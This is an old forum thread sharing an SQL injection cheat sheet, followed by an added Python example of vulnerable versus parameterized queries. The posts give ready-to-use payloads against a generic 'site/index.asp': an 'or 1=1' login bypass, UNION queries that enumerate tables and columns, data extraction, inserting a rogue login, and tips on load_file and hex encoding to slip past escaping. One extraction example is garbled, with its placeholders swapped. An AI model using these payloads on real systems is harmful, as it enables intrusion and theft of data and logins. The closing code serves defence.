Dark-k-nowledge Posted November 20, 2007

'logging in as the first person in the SQL database'
--text box--
login: hi' or 1=1--
pass: hi'or 1=1--
--url bar--
http://site/index.asp?id=hi' or 1=1--
Note: You can replace the 1 with a or 0, etc.

'getting the table names'
--text box--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
--url bar--
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
http://site/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

'to get the column names'
--text box--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--
Note: replace the 'tablename' text with the name of the table you want...
--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--

'retrieving data from a table'
--text box--
UNION SELECT TOP 1 table_name FROM column_name--
Note: replace table_name with the name of the table and column name with the name of the column...
--url bar--
http://site/index.asp?id=10 UNION SELECT TOP 1 table_name FROM column_name--

'Inserting data into the database'
INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--
Note: replace login_id, login_name, and password with the column names, replace table_name with the table name, and the values 111,name,pass with whatever you want, as long as they match the order of the columns.
--url bar--
http://site/index.asp?id=10 INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--

michee Posted November 21, 2007

There are a few more basic things:
1) The load_file function, although you need to have FILE_PRIV
2) where you have table_name='nume_tabela' it's better to put the table name in hex, because usually mysql_real_escape string is used and then it no longer works... in hex, though, it's OK :)
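
The login string from the first post and the escaping issue raised in the second, seen from the defending side, as an added example that is not part of either post: a concatenated query beside a parameterized one, plus type validation for a numeric `id`. The in-memory sqlite3 database, the `users` table and all function names are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 in memory stands in for the site's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login_id INTEGER, login_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return db

def login_concat(db, name, password):
    # Vulnerable form: input is pasted into the SQL text, so a quote in the
    # input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT login_name FROM users WHERE login_name = '%s' "
           "AND password = '%s'" % (name, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, name, password):
    # Hardened form: placeholders keep input as data, never as SQL text.
    row = db.execute(
        "SELECT login_name FROM users WHERE login_name = ? AND password = ?",
        (name, password)).fetchone()
    return row[0] if row else None

def user_by_id(db, raw_id):
    # A numeric parameter such as ?id=10 has no quote to break out of, so
    # quote escaping alone does not protect it; check the type, then bind.
    if not raw_id.isdigit():
        raise ValueError("id must be an integer")
    row = db.execute("SELECT login_name FROM users WHERE login_id = ?",
                     (int(raw_id),)).fetchone()
    return row[0] if row else None
```

With the bound query the posted login string is compared as a literal user name and matches no row, while the concatenated query returns the first row of the table.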